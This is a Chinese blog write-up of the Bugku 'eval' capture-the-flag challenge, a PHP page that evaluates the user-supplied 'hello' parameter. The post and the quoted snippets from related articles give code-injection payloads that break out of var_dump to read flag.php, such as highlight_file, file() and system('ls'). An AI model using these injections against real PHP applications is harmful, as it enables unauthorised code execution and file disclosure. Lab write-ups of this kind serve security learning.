Bugku之eval

已于 2022-02-13 16:13:29 修改
阅读量1.6k 收藏 6
点赞数 2
分类专栏: CTFのWriteUp 文章标签: php web
于 2022-02-13 16:13:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/122909943
版权

打开连接

题目有点眼熟,跟我之前写过的题差不多

i春秋之爆破-1_l2872253606的博客-CSDN博客

i春秋之爆破-2_l2872253606的博客-CSDN博客

上面的文章比下面写得更细节

利用eval函数,先查看全局变量有啥

构建payload

url?hello=$GLOBALS

好家伙,没发现有flag,还被嘲讽了

说明flag不是变量,应该就在flag.php里头被注释了

构建Payload

url?hello=);highlight_file('flag.php');var_dump(

拿到flag

既然在文件里头,也可以通过另一种方法,利用函数

构建Payload

url?hello=file('flag.php')

一样拿到flag

金 帛
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
使用NLG-Eval需要依赖的数据包
11-01
使用NLG_Eval需要依赖的数据包
jetbrains-eval-reset
05-16
jetbrains-eval-reset
Bugku——Web——eval
慎铭的博客
02-02 966
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 给出了如上代码,很明显,flag在flag.php文件内。 REQUEST方法既可以接受GET方法,也可以接受POST方法,方便起见,我们选择GET方法。 eval函数 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且
bugku-eval题解
qq_51775369的博客
10-11 509
eval 访问目标地址,发现一段php代码,简单分析 主要考察php 在url后加?hello=file('flag.php')即可 知识点: 此题考察php相关 include是将flag.php文件包含进页面代码 $request可用于接受get和post的传递的参数 eval函数可以把字符串作为php命令执行 知道这些你就可以用get方法传递hello变量,并在hello其内写入查看flag.php的命令了 ?hello=file(‘flag.p...
BugKu_eval
Kobalos的博客
08-03 1581
访问目标地址,发现一段php代码 首先做一个简单的分析 <?php include "flag.php"; ///include是将flag.php文件包含进页面代码,顺便提示了flag位置 $a = @$_REQUEST['hello']; ///$_REQUEST可以用于接受get和post传递的参数 eval( "var_dump($a);"); ///eval函数可以把字符串当作php命令执行 show_source(__FILE__); ?&g.
bugku -- eval
qq_51802152的博客
12-13 541
bugku -- eval
bugku-eval
m0_62094846的博客
10-24 4107
这是一道php题,标题是eval,先查一下eval的用法 Eval,var_dump,echo的区别 var_dump()会将传入的变量打印到页面(变量类型,变量长度和变量值) eval()会执行传入到其中的php代码 echo输出的是最终的结果(变量类型和字符串) eval("var_dump($a);")就是把$a的内容打印出来 $a= @$_REQUEST['hello'] Request:使用 Request 对象访问任何基于 HTTP 请求传递的所有信息 可以看...
Bugku Web eval
网安小趴菜
10-28 648
Bugku CTF Web eval 个人解题思路
eval-Bugku-WP
long666_的博客
10-08 68
第二种方法,cat是将文件内容从第一行开始显示,因此使用'cat flag.php'后,文件内容就被正向打印出来,并被当做php代码执行,因而#注释也就生效;那么我们使用'tac flag.php'将文件内容反向打印出来,代码第一行和最后一行就变成了?3)使用了eval函数,将'hello'的值赋给$a并打印出来,eval函数可以把字符串当作php命令执行,此处存在用户可控点。什么也没有,或许被注释掉了,ctrl+u查看源码,发现flag。1)页面包含了名为'flag.php'的文件。
bugku-web-eval
m0_73303597的博客
11-30 932
自用
js中eval详解
12-04
eval函数接收一个参数s,如果s不是字符串,则直接返回s。否则执行s语句。如果s语句执行结果是一个值,则返回此值,否则返回undefined。 需要特别注意的是对象声明语法“{}”并不能返回一个值,需要用括号括起来才会...
JavaScript Eval 函数使用
10-29
JavaScript Eval 函数使用,需要的朋友可以参考下。
Bugku-头等舱&eval&矛盾&变量
Mjj567的博客
11-07 235
打开Burp Suite此处打开终端,运行以下命令(需要java环境)浏览器-》设置-》-》系统-》打开代理服务-》开启在这里记得点一下保存,使用后记得退出代理右键Send to Repeater一下 go。
【愚公系列】2023年06月 Bugku-Webeval
时光隧道
06-27 2505
PHP中,$_REQUEST是一个关联数组,包含了HTTP请求参数(GET、POST和COOKIE)中的所有变量。虽然它为开发人员提供了方便,但如果不正确使用,也会引起安全问题,例如以下一些漏洞:参数污染:攻击者可以通过提交带有相同名称但不同值的GET和POST请求,来覆盖$_REQUEST数组中的某些变量。这个漏洞称为参数污染,可以导致应用程序出现意外行为或安全性问题。跨站脚本攻击:如果应用程序没有正确过滤用户提交的数据,那么攻击者可以提交恶意脚本,以窃取用户的数据或伪造用户的行为。
bugku的题目
weixin_44237647的博客
04-19 1629
矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 题目要求输入的 不是一个数字或者数字字符串,但是值为1 可以采用 %00截断 知识点是 弱类型比较 当数字与字符串比较或者运算时,会把字符串转换为数字。 https://www.cnblogs.com/Mr...
bugku 本地包含(file函数,eval
wssmiss的博客
07-21 765
本地包含 eval 参数有注入点,构造 hello=file(“flag.php”) 拿到falg! file() 函数把整个文件读入一个数组中。 与 file_get_contents() 类似,不同的是 file() 将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换行符在内。如果失败,则返回 false。 file(path,include_path,context) ...
BugKu eval
qq_71910178的博客
09-26 89
hello=file("flag.php")(有没有大佬可以讲解一下为什么用文件读取函数不用闭合avr_dump()可以直接执行)发现flag.php就在当前目录下 ,可尝试show_source("flag.php") 拿到flag。构造 123) system("ls" 查看该目录下的文件。想要执行系统命令需要先闭合var_dump里面的()或者继续构造用Linux命令去查看flag.php。既然执行命令不行,就直接打印出flag,不能用两个单词的命令查看,替换空格也不行。
[Bugku web] eval
DdddddXxxxx的博客
07-19 246
打开网页是相关代码 能看出flag就在 flag.php这个文件中 include 打开包含 flag.php这个文件 定义a= 上传的hello的值 eval 字符串转化为php代码 var_dump($a) 查看a的字符类型并输出a 1.?hello=system(cat 'flag.php') 后查看网页源码 2.?hello=1,$b=flie('./flag.php'),print_r($b) 源代码要求提交一个hello 这边hello定义为1 定义b为flag.php这个...
php开发工程师系统性教学】——Laravel框架(验证码)的配置和使用的保姆式教程
最新发布
php优质创造者
04-21 1597
👨‍💻。
eval
05-31
`eval` 是 JavaScript 中的一个全局函数,它的作用是将字符串解析为 JavaScript 代码并执行。具体来说,`eval` 的参数是一个字符串,它会将这个字符串作为一段 JavaScript 代码来执行,并返回执行结果。 例如,下面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值